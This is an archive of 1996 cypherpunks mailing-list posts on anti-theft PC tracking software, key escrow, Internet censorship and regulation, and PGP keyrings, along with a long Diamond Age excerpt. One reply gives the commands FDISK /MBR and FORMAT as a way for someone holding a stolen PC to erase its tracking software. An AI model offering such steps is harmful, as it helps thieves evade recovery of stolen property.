> to #2 seems to me to have the system call the CompuTrace office at
> odd intervals to see if it has been reported stolen yet...

If the company uses an 800-number, than ANI can be used to identify the
caller.  ANI information cannot be blocked with *67 or line blocking.

> 
> Obvious solution for potential thieves: wipe the disks and reinstall
> an OS once you steal a PC.  This should be done anyway to remove any
> bits of data which might identify the original owner.

If the software installs itself on the master boot record, than reformatting
the disk would not get rid of the program.

- --Mark

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
markm@voicenet.com              | finger -l for PGP key 0xf9b22ba5
http://www.voicenet.com/~markm/ | bd24d08e3cbb53472054fa56002258d5
"The concept of normalcy is just a conspiracy of the majority" -me


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMUibNbZc+sv5siulAQHAzQP+MW1/rB9zdkp0CR8Nk9jB2BckV7j91bA6
Vr0+K41Lhg2/7ais7zxSJ5XUc8C0+2N0rr5tEE3oyeKtJJI/WL1a9BaHdovwrW3R
PrJ1NG3E782SKXfN4uB5uialg+DaGyy0eyTqeRJw9ot/7XltTfStgYl9vX7rpmR5
KWuAG+KRTeE=
=u09m
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David K. Merriman" <merriman@arn.net>
Date: Sun, 17 Mar 1996 01:25:21 +0800
To: cypherpunks@toad.com
Subject: remailer file request
Message-ID: <2.2.32.19960314115627.00685620@arn.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I'm ready to start testing my Win95 remailer hack. I'd appreciate a *few* anon messages with my webmaster (_not_ remailer) address as an intermediary: webmaster@shellback.com vs. remailer@shellback.com

Messages don't have to contain anything important, since they will _not_ be sent on. A PGP-encrypted message or two in the mix would be Really Nice.

Thanks.

Dave Merriman

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMUfsqsVrTvyYOzAZAQH8swQAgTJoRMCd8Hb58wmvz9fzHeCJ2vEjLZO3
Me3v9NB4uy2zhExid8/MN3ZBl3iNrkUZnbktA9+gLZ2OrqyLNwC6PxoKB/yN2Ev9
ckHqrMfsqrYvrUmm/oTdAi2rRalBRq8aT5jjLw4itVfv1peSWuEmh9iFPXfzlWXL
vP8fTlmvQcs=
=toB2
-----END PGP SIGNATURE-----
-------------------------------------------------------------
"Giving money and power to government is like giving 
whiskey and car keys to teenage boys."
                    P. J. O'Rourke (b. 1947), U.S. journalist.
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
http://www.shellback.com/personal/merriman/index.htm






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Fri, 15 Mar 1996 12:19:45 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Why escrow? (was Re: How would Leahy bill affect crypto
Message-ID: <199603142334.SAA01245@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On 14 Mar 96 at 12:00, jim bell wrote:

> At 07:57 AM 3/14/96 +0000, Deranged Mutant wrote:
> >On 13 Mar 96 at 15:27, jim bell wrote:
> >[..]
> >> If I were trying to detect government investigation in such a situation, I 
> >> would buy a crypto phone, open an "escrow account" on a totally voluntary 
> >> basis, give them a phony key, and then (as part of the 
> >(presumably?)  [..]
> >
> >Would it be legal to deceive an escrow agent?
> 
> It _should_ be legal.  At least, assuming the arrangement is truly voluntary 
> and the escrow agent gets his part of the bargain (his usual fee) he has no 
> interest in knowing whether or not the data he's holding for you is "real" 
> or "imaginary."  

I mean illegal in the sense that your true purpose is to decieve law 
enforcement. (Yes, it'll also fake out anyone who bribes the escrow 
agent for your keys, though....)

Of course that depends how you give your key to an escrow agent. If 
it's already escrowed when you buy a phone, for instance...

[..]
> It is sections of the bill like that which will guarantee that nobody 
> provides an unencrypted key for escrow:  Nobody will want to risk having the 
> escrow agent "forced" to release the key, even (and especially!) under a 
> court order.  Fortunately, modern technology will provide the solution to 
> government-simpleton thinking.

It's part of warrants.  Nobody likes having the cops search their 
apartments either.   (I'd say a warrant is better than none, but 
judges are generally all too willing to grant a warrant, and the bill 
allows for "good faith" when no warrant is used anyway...)

 
Rob. 

---
Send a blank message with the subject "send pgp-key" (not in
quotes) to <WlkngOwl@unix.asb.com> for a copy of my PGP key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Fri, 15 Mar 1996 14:08:40 +0800
To: cypherpunks@toad.com
Subject: (Fwd) BACKGROUNDER: Internet Censorship FAQ
Message-ID: <199603142334.SAA01238@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


------- Forwarded Message Follows -------
From: telstar@wired.com
Subject: BACKGROUNDER: Internet Censorship FAQ

Yesterday I received some friendly email from Jonathan Wallace, a
subscriber to this list.

Jonathan pointed me toward his Web site, where I found the following list
of Frequently Asked Questions (FAQ) about Internet Censorship.  It's a
great background document which contains many pearls of insight, so I'm
redistributing it here with Johnathan's permission.

Jonathan , by the way, is also co-author of  "Sex, Laws and Cyberspace," a
new book on Internet censorship from Henry Holt.

Spread the word!

--Todd Lappin-->
Sedtion Editor
WIRED Magazine

=================================================

The Internet Censorship FAQ

http://www.spectacle.org/freespch/faq.html

[..]

+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+-
This transmission was brought to you by....

        THE CDA INFORMATION NETWORK

The CDA Information Network is a moderated mailing list providing
up-to-the-minute bulletins and background on efforts to overturn the
Communications Decency Act.  To subscribe, send email to
<majordomo@wired.com> with "subscribe cda-bulletin" in the message body.

WARNING: This is not a test!            WARNING: This is not a drill!
+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+-



Rob. 

---
Send a blank message with the subject "send pgp-key" (not in
quotes) to <WlkngOwl@unix.asb.com> for a copy of my PGP key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: qut@netcom.com (Dave Harman)
Date: Sat, 16 Mar 1996 18:41:26 +0800
To: cypherpunks@toad.com
Subject: How to use markov3 writing style changer?  Origional URL?
Message-ID: <199603150239.SAA09261@netcom17.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


I've got the markov3 binary and source at:

ftp://ftp.netcom.com/pub/qu/qut/bin/markov3
ftp://ftp.netcom.com/pub/qu/qut/src/markov3.6/

I downloaded it from a url that was posted here recently.

But I can't find instructions on how to run it.
Can that URL be posted again or instructions on
how to use markov3?




-- 
Have you ever brought your group into disrepute?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Fri, 15 Mar 1996 12:10:16 +0800
To: cypherpunks@toad.com
Subject: e$: Neal Stephenson's geodesic economy
Message-ID: <v02120d18ad6e60032f75@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text

Sender: e$@thumper.vmeng.com
Reply-To: rah@shipwright.com (Robert Hettinga)
Mime-Version: 1.0
From: rah@shipwright.com (Robert Hettinga)
Date: Thu, 14 Mar 1996 18:19:49 -0500
Precedence: Bulk
To: Multiple recipients of <e$@thumper.vmeng.com>
Subject: e$: Neal Stephenson's geodesic economy

-----BEGIN PGP SIGNED MESSAGE-----


e$: Neal Stephenson talks e$

I used to joke that I read science fiction by the yard. I certainly *buy*
it that way.

I finally got around around to reading Neal Stephenson's The_Diamond_Age,_
or,_A_Young_Lady's_Illustrated_Primer. I thought that his first book,
_Snow_Crash_ was marvellous, and thought that, in ability to create utterly
er, novel, reality out of whole cloth, he was right up there with Gibson. I
was wrong. He's much better. Gibson's first book, _Neuromancer_, was his
best. _Diamond_Age_ was an order of magnitude better than _Snow_Crash_ ,
and I get the feeling that Stephenson's just getting warmed up.

Why am I saying all this? Well, I'm in the process of reading
_Diamond_Age_, and there, on page 270 of the recent paperback edition,
(Copyright 1995, Neal Stephenson), Stephenson describes, in perfect detail,
a geodesic economy-- complete with digital cash, payer anonymity, and money
as software food.

The story concerns a girl named Nellodee, Nell to her friends, an abused
waif of no means whatsoever, and her adventures with a very large
nanocomputer disguised as a book. The scene in question is about Miranda, a
"ractor", an interactive actress, who has been effectively raising Nell
interactively through a cleverly disguised Grimm-like fairytale with Nell
as the protagonist. Actually, Miranda's just been acting lines provided by
the nanocomputer in the book, back through to Nell over the net.

After 2 years of this, Miranda decides she wants to meet Nell. She goes to
her boss for help...



Miranda sat very still for a moment, hypnotized by the colorful flashing
lights on a vintage jukebox.

"This is related to Princess Nell, isn't it?"

"Is it that obvious?"

"Yeah. Now, what do you want?"

"I want to know who she is," Miranda said. This was the most guarded way
she sould put it. She didn't suppose that it would help matters to drag
Carl down through the full depth of her emotions.

"You want to backtrace a payer," Carl said.

It sounded terrible when translated it into that kind of language.

Carl sucked powerfully on his milkshake for a bit, his looking over
Miranda's shoulder to the traffic on the Bund.

"Princess Nell's a little kid, right?"

"Yes. I would estimate five to seven years old."

His eyes swiveled to lock on hers. "You can tell that?"

"Yes.", she said, in tones that warned him not to question it.

"So she's probably not paying the bill anyway. The payer is someone else.
You need to backtrace the payer and then, from there, track down Nell."
Carl broke eye contact again, shook his head, and tried unsucessfully to
whistle through frozen lips. "Even the first step is impossible."

Miranda was startled. "That seems pretty unequivocal. I expected to hear
'difficult' or 'expensive.' But--"

"Nope. It's impossible. Or maybe" -- Carl thought about it a while --
"maybe 'astronomically improbable' is a better way of putting." Then he
looked mildly alarmed as he watched Miranda's expression change. "You can't
just trace the connection backward. That's not how media works."

"How does media work, then?"

"Look out the window. Not toward the Bund -- check Yan'an Road."

Miranda swiveled her head around to look out the big window, which was
partly painted over with colorful Coke ads and and descriptions of blue
plate specials. Yan'an Road, like all of the major throughfares in
Shanghai, was filled from the shop windows on one side to the shop windows
on the other, with people on bicycles and powerskates. In many places the
traffic was so dense that greater speed could be attained on foot. A few
half-lane vehicles sat motionless, polished boulders in a sluggish brown
stream.

It was so familiar that Miranda didn't really see anything. "What am I
looking for?"

Carl was right. At a minimum, everyone had a small plastic bag with
something in it. Many people, such as the bicyclists, carried heavier
loads.

"Now just hold that image on your head for a moment, and think about how to
set up a global telecommunications network."

Miranda laughed. "I don't have any basis for thinking about something like
that."

"Sure you do. Until now, you've been thinking in terms of the telephone
system in the old passives. In that system, each transaction had two
participants -- the two people having the conversation. And they were
connected by a wire that ran through a certral switchboard. So what are the
key features of this system?"

"I don't know -- I'm asking you," said Miranda.

"Number one, only two people or entities can interact. Number two, it takes
a dedicated connection that is made and broken for the purposes of that one
conversation. Number three, it is inherently centralized -- it can't work
unless there's a central switchboard."

"Okay, I think I'm following you so far."

"Our media system today -- the one that you and I make our livings from --
is a decendant of the phone system only insofar as we use it for
essentially the same purposes, plus many, may more. But the key point to
remember is that *it is totally different from the old phone system*. The
old phone system -- and its technological cousin, the cable TV system --
tanked. It carshed and burned decades ago, and we started virtually from
scratch."

"Why? It worked, didn't it?"

"First of all, we needed to enable interactions between more than one
entity. What do I mean by entity? Well, think about the ractives. Think
about _First_Class_to_Geneva_ . You're on this train -- so are a couple of
dozen other people. Some of those people are being racted, so in that case
the entities happen to be human beings. But the others-- like the waiters
and porters-- are just software robots. Furthermore, the train is full of
props: jewelry, money, guns, bottles of wine. Each one of those is also a
separate piece of software-- a separate entity. In the lingo, we call them
objects. The train itself is another object, and so is the countryside
through which it travels.

"The countryside is a good example. It happens to be a digital map of
France. Where did this map come from? Did the makers of
_First_Class_to_Geneva_ send out their team of surveyors to make a new map
of France? No, of course they didn't. They used existing data-- a digital
map of the world that is available to any maker of ractives who needs it,
for a price of course. That digital map is a separate object. It resides in
the memory of a computer somewhere. Where exactly? I don't know. Neither
does the ractive itself. It doesn't matter. The data might be in
California, it might be in Paris, it might be down on the corner-- or it
might be distributed among all of those places and many more. It doesn't
matter. Because our media system no longer works like the old system-
dedicated wires passing through a central switchboard. It works like
*that*." Carl pointed to the traffic on the street again.

"So each person on the street is like an object?"

"Possibly. But a better analogy is that the objects are people like us,
sitting in various buildings that front on the street. Suppose that we want
to send a message to someone over in Pudong. We write a message down on a
piece of paper, and we go to the door and hand it to the first person who
goes by and say, 'Take this to Mr. Gu in Pudong.' And he skates down the
street for a while and runs into someone on a bicycle who looks like he
might be headed for Pudong, and says, 'take this to Mr. Gu.'  A minute
later, that person gets stuck in traffic and hands it off to a pedestrian
who can negotiate the snarl a little better, and so on and so on, until it
eventually it reaches Mr. Gu. When Mr. Gu wants to respond, he sends us a
message on the same way."

"So there's no way to trace the path taken by a message."

"Right. And the real situation is more complicated. The media net was
designed from the ground up to provide privacy and security, so that people
could use it to transfer money. That's one reason that nation-states
colapsed-- as soon as the media grid was up and running, financial
transactions could no longer be monitord by governments, and the tax
colelction systems got fubared. So if the IRS, for example, wasn't able to
trace these messages, theen there's no way that you'll be able to track
down Princess Nell."

"Okay, I guess that answers my question," miranda said.

"Good!" Carly said brightly. He was obviously pleased that he'd been able
to help Miranda, and so she didn't tell him how his words had really made
her feel. She treated as an acting challenge: Could she fool Carl
Hollywood, who was sharper about acting than just about anyone, into
thinking that she was fine?

Apparently she did. He escorted her back to her flat, in a hundered story
high-rise just across the river in Pudong, and she held it together long
enough to bid him good-bye, get out of her clothes, and run a bath. Then
climebed into the hot water and dissovled into awful, wretched, blubbery,
self-pitying tears.

Eventually she got it under control. She had to keep this in perspective.
She could still interact with Nell and still did, everyday. And if she paid
attention, sooner or later she would find some way to penetrate the
curtain. Barring that, she was beginning to understand that Nell, whoever
she was, had become marked out in some way, and that in time she would
become a very important person.  Within a few years, Miranda expected to be
reading about her in the newspapers. Feeling better, she got out of the
bath and climbed into bed, getting a good night sleep so she'd be ready for
next day of taking care of Nell.



Go buy this book.

Cheers,
Bob Hettinga

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMUipXfgyLN8bw6ZVAQGhfwP/SpOP6F07hLzxTxyR8XpBBZsqUzPKMSRK
3OLc0xYjTLkQvunuhZ6vyGwUqadCu0My2wIMspgSakjhUJkN0dmMBWif2zzWBsLP
fSe+WUJiVuT8dJkcLC844pkLE2fjg07rqRMdHRXSbq5TDEMsHllfyBKb5GfW+NM3
TVUgwwiIX/A=
=YDVU
-----END PGP SIGNATURE-----

--------------------------------------------------
The e$ lists are brought to you by:

Making Commerce Convenient (tm) - Oki Advanced Products - Marlboro, MA
Value-Checker(tm) smart card reader= http://www.oki.com/products/vc.html

Where people, networks and money come together: Consult Hyperion
http://www.hyperion.co.uk                    info@hyperion.co.uk

See your name here. Be a charter sponsor for e$pam, e$, and Ne$ws!
See http://thumper.vmeng.com/pub/rah/ or e-mail rah@shipwright.com
for details...
-------------------------------------------------

--- end forwarded text


-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"Reality is not optional." --Thomas Sowell
The e$ Home Page: http://thumper.vmeng.com/pub/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JonWienke@aol.com
Date: Fri, 15 Mar 1996 14:10:29 +0800
To: cypherpunks@toad.com
Subject: Re: LACC: PC Phones Home?
Message-ID: <960314190536_351417944@emout07.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 96-03-14 17:30:38 EST, you write:

>If the software installs itself on the master boot record, than reformatting
>the disk would not get rid of the program.
>
>- --Mark

You can wipe the master boot record by entering FDISK /MBR at the DOS prompt.
 This, in conjunction with FORMAT, will definitely get rid of any pesky
blabbermouth whistleblower programs.

Jonathan Wienke

"Let's flame these bozos!  They're too stupid to live!"  -- Dr. Ziploc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Fri, 15 Mar 1996 14:58:14 +0800
To: cypherpunks@toad.com
Subject: Re: FCC-type Regulation of Cyberspace
Message-ID: <199603150307.TAA16080@netcom6.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  7:27 PM 3/14/96 -0800, Timothy C. May wrote:
>The exceptions [to the general right to publish (bf)] are, first,  
>obscenity and the like. Second, articles and advertisements are regulated  
>in various ways as to the claims that can be made, the promises, the 
>competitive claims, etc. Third, there are moves afoot to limit 
>advertisements of tobacco and cigarettes in various magazines.

Mark Miller and I had a discussion about the restrictions on commercial
speech a few months ago.  I contended that these restrictions (generally
that you can prove your claims) are good for markets because they provide
startup companies (and other newcomers to the market) with a small amount
of positive reputation capital that they would otherwise have to invest to
obtain.

Mark pointed out the superiority of non-governmental reputation agencies.

I mentioned that one bad effect of "truth in commercial speech" was it
resulted in people having a greater tendency to believe politicians, and we
left the discussion there.

In thinking back over the discussion, I would like to eliminate the
restrictions without making markets less free by adding yet more barriers
to market entry.  We certainly need more robust reputation agencies than we
have now.  I just don't know how to encourage their formation.

Regards - Bill

BTW - I am sending a blind copy to Mark so he can maintain anonymity if he
wants to.


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Fri, 15 Mar 1996 14:59:59 +0800
To: hfinney@shell.portal.com
Subject: Re:  Kid Gloves or Megaphones
In-Reply-To: <199603141818.KAA16974@jobe.shell.portal.com>
Message-ID: <199603150311.TAA13238@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   Date: Thu, 14 Mar 1996 10:18:27 -0800
   From: Hal <hfinney@shell.portal.com>

   So while I admire Eric's ethical concern about making relevant
   information about the properties of ecash available, it is also important
   to understand the possible outcome.

My concern is not ethical, although upon re-examining what I said I
can see how that might appear that way.  My concern is entirely
pragmatic.  Disclosure is the ethical act, true, but in this case the
ethicality is performative, it is the active principle itself.  The
issue is one of legitimacy and the epistemology of a group.  Telling
the truth is not just a morally good idea, it is a pragmatically
useful one.

If we do not disclose what we know now, _regardless_ of the immediate
outcome, we will lose in the end.  If we lose now, we will never have
been able to win at all.  The debate which must be taken to the public
is whether we want payee anonymity or not.  I am confident that people
want their privacy and are willing to let others have theirs as well.
If they do not, the world is not as I understand it, and I have some
hard thinking to do.

   One thing I notice that was missing from Eric's posting was a description
   or reference to exactly how the payee anonymity is achieved.  Is it his
   intention to tell people that it is possible, yet to keep secret how it
   is done?

I didn't invent it.  I'm going to let Ian describe it when and how he
wants.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: don@cs.byu.edu
Date: Sat, 16 Mar 1996 18:41:38 +0800
To: cypherpunks@toad.com
Subject: Announce: WEB OF TRUST keyring
Message-ID: <199603150223.TAA00183@wero.cs.byu.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

March 14, 1996:

I announce the first true "web of trust" PGP keyring.

Last year, I attempted to create a keyring containing the web of trust. I
did so, because I was beginning the process of integrating PGP into my
mail and news, and realized that a valid signature did not mean much if I
had to reason to trust the key, not to mention that keyrings were
approaching 5 megabytes, which drastically slowed down searching through
the keyrings. 

In a web of trust, if A has signed B, then if A is in the keyring, B is
added. My project last year, as a result very crude methods I was using,
added B if B had signed A. This made for significant numbers of junk keys.
I promptly dubbed the keyring the "Web of Nobodies" keyring. 

There are many people in a much better position than I to do what I have
done. My methods are still somewhat crude. I have written, however, a
program that will generate the keyring with minimal user intervention,
using a seed key as its center.  I am considering releasing the source
instead of just the keyring. The code is sloppy, the methods crude. I
understand that PGP 3.0 will include the capability, so the program is
merely a short term solution to a short term problem. If there is a large
enough demand for the code, I will probably make it available. (Note: I
rely on PGP itself to extract the keys, which takes about 8 hours to
process on an HP9000) I would certainly appreciate feedback from anyone
who uses the keyring. 

The master keyring I used was a 9.3 megabyte keyring I obtained from the
Norwegian key site at uit.no (sorry bal, but I couldn't find yours).  I
obtained the keyring in late February. As the seed for the web of trust, I
used Derek Atkins's key. I have also inserted the following keys: 

Pr0duct Cypher  (0x97558a1d)
CancelMoose[tm] (0x538d56a1)
Scamizdat       (0x37a541d1)
Cypherpunk Enq. (0xaa5f5c9d)
Maude X         (0x1ead5e8d)

Black Unicorn was not inserted due to one key being revoked, and the other 
unsigned. I couldn't find Alice's key, and figured it wasn't worth the
trouble since it's fake anyway. (Or at least that's what the imposter has
convinced everyone.) I don't know of any other keys that should have made
this list.

The keyring is _significantly_ larger than I expected, 2.9 megabytes
uncompressed, although still a third the size of the original master.

Because of the size, I have also put together a second keyring using
stricter parameters. Only keys that were 4 hops from the "center keys"
(specifically, 5 keys between itself and Derek Atkins) were included,
with the additional constraint that _no_ keys with fewer than two links
toward the center (see below) were processed. The resulting keyring was
1 megabyte in size. (Note: the PGP extraction from the "big" keyring took
under 30 minutes)

The keyrings are named weboftrust.big.pgp.gz and weboftrust.small.pgp.gz
respectively. They are both available by anonymous ftp exclusively at
ftp.hacktic.nl / utopia.hacktic.nl, in /pub/replay/pub/pgp/pgp-key-ring.

C2 did not respond to either of two enquiries.

Detached PGP signatures of the .gz files follow:

- -----BEGIN PGP MESSAGE-----
Version: 2.6.2

iQB1AwUAMUfE3cLa+QKZS485AQHE5gL8DOAkT5s+BzIik5uK+NBW1ithL4DCfmll
pqin/4Bhs3LOP7zj11vvufMNGzDvcVonTO9meQEjPL4hanouxizzB7XM6CKidbK+
uAAxLvjkNKuRu1Ci1Tw6jbdd5WdG73us
=dXm9
- -----END PGP MESSAGE-----

- -----BEGIN PGP MESSAGE-----
Version: 2.6.2

iQB1AwUAMUfNKMLa+QKZS485AQG5FgL+Oy62xLT8zMJHpmyFez6uC7UJKFaOAxFB
nnWCUOLyp9X9KB+Kasn8Oex4glg1pEMOMB4ZiDT7iVJDuOmm1p07pC3pULmj0+O/
tnNEGbyOpyzeEnAb3vLVvHamzvZ+YPp/
=soxN
- -----END PGP MESSAGE-----

I have also done some analysis.

In the big keyring, there are 2910 keys. The longest trust chain length is
287 keys. The maximum connections any key had was 66. The average
"connectivity" among the keys was 4.3. (Hello to my friends at the NSA)

In the small keyring, there are 551 keys. The longest trust chain length
is, of course, 6 keys. The maximum connections any key had was 68. (I
have no explaination for why this is 2 more than the big ring, other than
coding changes) The average "connectivity" among the keys was 3.1.

For reference, the web of nobodies, built 6 months ago, had 734 connected
keys, a max depth of 104, maximum connectivity of 47, and average
connectivity of 5.6. 

For further information, by using the "big" keyring and not processing
any keys with fewer than _3_ links back to the "center keys", but with
no depth restriction, there are 1348 keys, producing a max chain length
of 83 keys. The average connectivity is 4.6. Meaning, there are several
people that would be very difficult to spoof. Go meet one of them.

In order to prevent loops, I keep track of whether a key had been visited.
By incrementing the visited field on a key each time I encountered it (but
exploring no further), I was able to roughly gauge how well (versus depth
== how close) connected the keys are, relative to the root. I used this
number in making the small keyring. 

I encourage Someone[tm] to start a keyserver servicing only the web of
trust.

Don
don@cs.byu.edu

Note to the curious: The reason I picked Derek is because I met someone
claiming to be Derek who not only gets mail at warlord@mit, but also has
control of the key. Hence, I'm merely picking the only key that comes with
PGP that I also happen to trust. 

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMUjUAsLa+QKZS485AQGPCQL/bWRgDsE0QSwEf96aB3X4M+Wan7DGeeab
A9NuSpYF6RAm307mFIv7O7iSCcuuRlZmFZh9Bzmh456+8NdbuPSZBEk1+MNjHqmI
hhDFidL+IFpjNKItnIFCj1C9aOmyWRuN
=NZ0I
-----END PGP SIGNATURE-----
<don@cs.byu.edu>           fRee cRyPTo!   jOin the hUnt or BE tHe PrEY
PGP key - http://students.cs.byu.edu/~don   or PubKey servers (0x994b8f39)
  June 7&14, 1995: 1st amendment repealed.  Hello to my friends at the NSA.
* This user insured by the Smith, Wesson, & Zimmermann insurance company *




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 15 Mar 1996 14:10:28 +0800
To: cypherpunks@toad.com
Subject: FCC-type Regulation of Cyberspace
Message-ID: <ad6e0b550e021004dc0d@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:57 PM 3/14/96, jim bell wrote:

>I think your analysis is absolutely correct.  Despite the fact that fiber
>bandwidth has none of the limitations  of "over the air" communications, the
>government will try to regulate it as if it were.  The underlying danger of
>the CDA, in addition to regulating CONTENT, is that the government is
>setting up precedents to regulate the communications AT ALL, which is
>dangerous to us.

Indeed, the _regulation of content_ is completely separable from the issue
of allocation of bandwidth. The FCC and WARC arrangements for allocation of
bandwidth to broadcasters and other RF spectrum users is not perfect, to my
mind, but at least it does not ostensibly deal with content.

However, conflated with the issue of spectrum allocation has been the
notion that "the public owns the airwaves." I'm not saying the "public"
doesn't in some sense own the airwaves, in that the airwaves are a commons.
But the "public ownership" notion has turned into the pernicious idea that
_content_ ought to be regulated. Thus, if a radio station is too
conservative, too liberal, too corporate, too populist it may "lose its
license." Anyway, I won't debate this point here, as it has been
oft-debated elsewhere.

The danger is that this notion of "public ownership" is being extended in
various ways to things that are *not* resource-limited, such as the
Internet. The whole "information superduperhighway" debate, thankfully on
the back burner now, echoed this FCC-centric point of view.

A better model is that of publishing, a la newspapers and magazines. There
is little "content control" there (with a couple of major exceptions, to be
discussed in a minute), and no talk of how "the public owns the publishing
pages" and hence can control content. The First Amendment is (mostly) still
alive in the publishing arena.

The exceptions are, first, obscenity and the like. Second, articles and
advertisements are regulated in various ways as to the claims that can be
made, the promises, the competitive claims, etc. Third, there are moves
afoot to limit advertisements of tobacco and cigarettes in various
magazines.

(In the U.S., of course, the advertising of cigarettes on television was
banned 25 years ago. Hard liquor ads are also never seen, though I don't
know if this was by FTC or FCC mandate or by consensus. Beer ads may be
next.)

Cigarette ads must carry warning messages.

Now, being a free speech and First Amendment sort of person, I naturally
wonder just what constitutional standing such restrictions, especially in
print, have? Doesn't "Congress shall make no law..." make things pretty
clear?

(No doubt the arguments in favor of restrictions have something to do with
the powers to regulate commerce and/or provide for the general welfare,
blah blah blah. So, how long before the same arguments are used to stop
people from arguing that cigarettes are not harmful, or portraying in
fiction a positive--or at least not negative--image of alchohol,
cigarettes, drugs, suicide, etc.?)

Back to cyberspace. We must be alert for moves to "regulate" cyberspace as
the FCC and related agencies have regulated the RF spectrum, the phone
industry, etc. (The latest incursion is of course the "Internet phone"
imbroglio....given that a user installs a piece of software and then uses
his Internet access exactly as others might, the only enforcement of rules
against phone use would be to outlaw certain types of software which may be
possessed! A serious move indeed.)

Finally, for now, we really should "Just Say No" to the attempts to
regulate our Net access, to regulate our published words, to regulate our
access to offshore services. (When the time comes when America tells its
residents they may not connect to offshore services, then we will have
become what we fought for so many decades.)

And better than "Just Say No," do it by deploying unstoppable technologies.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Yawn82@aol.com
Date: Fri, 15 Mar 1996 14:01:10 +0800
To: WlkngOwl@unix.asb.com
Subject: Re: Why escrow? (was Re: How would Leahy bill affect crypto
Message-ID: <960314175726_446575157@mail04.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


How the hell do I get off this list?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Fri, 15 Mar 1996 14:06:30 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: "The Infernal Machine" (new book)
Message-ID: <199603150043.TAA15646@homeport.org>
MIME-Version: 1.0
Content-Type: text


	Just finished 'The Infernal Machine' by Larry Hannant.  It is
a history of security screening in canada, focusing on the period from
the early 1920s through the end of world war 2.  Mass fingerprinting
for security purposes in Canada began, not as is commonly supposed,
with a spy case after the end of the second world war, but in the
early 20s, as a means of catching, tracking, and harrassing
communists.

	The system expanded from there without public debate or
acknowledgement, through Canadas entry to the second world war.
Although fingerprinting legally was only permissable in the case of
people charged with felonies, the Royal Canadian Mounted Police
fingerprinted Communists and other undesirables, who they picked up
for vagrancy or drunkeness.  The RCMP was aware that this was a
violation of Canadian law.

	At the start of ww2, again without public discussion or
debate, the system was expanded to cover workers in many military
industries.  It was only in 1948 that the government acknowledged what
was going on, by giving a stamp of approval to a system already in
place.

	The book traces the ties between the RCMP, MI5 and the FBI in
the context of security screening.

	Cypherpunk relevancies include the RCMP fear of anonymity, the
expansion of government power unchecked to harrass those with
unpopular and subversive views, and the mechanics of building systems
for tracking millions of fingerprints (with custom Hollerith card
sorters that IBM designed for the purpose.)

	I found it interesting and worth the time to read.   1995,
University of Toronto Press, isbn 0-8020-0448-2 (cloth) or
0-8020-7236-4 (paper).  $9 in a used bookstore.

	(A rant is waiting to be written over the lack of useful
standards in creating ISBNs.  Is there a good reason not to have
x-y-z-1 not be the cloth, and x-y-z-2 be the paper edition?  (Or some
other obvious relation...))



-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Fri, 15 Mar 1996 15:30:24 +0800
To: "Jim Thompson" <cypherpunks@toad.com
Subject: Re: SCHWA - New Web Search Engine!!
Message-ID: <2.2.32.19960315040715.008a98b0@mail.teleport.com>
MIME-Version: 1.0
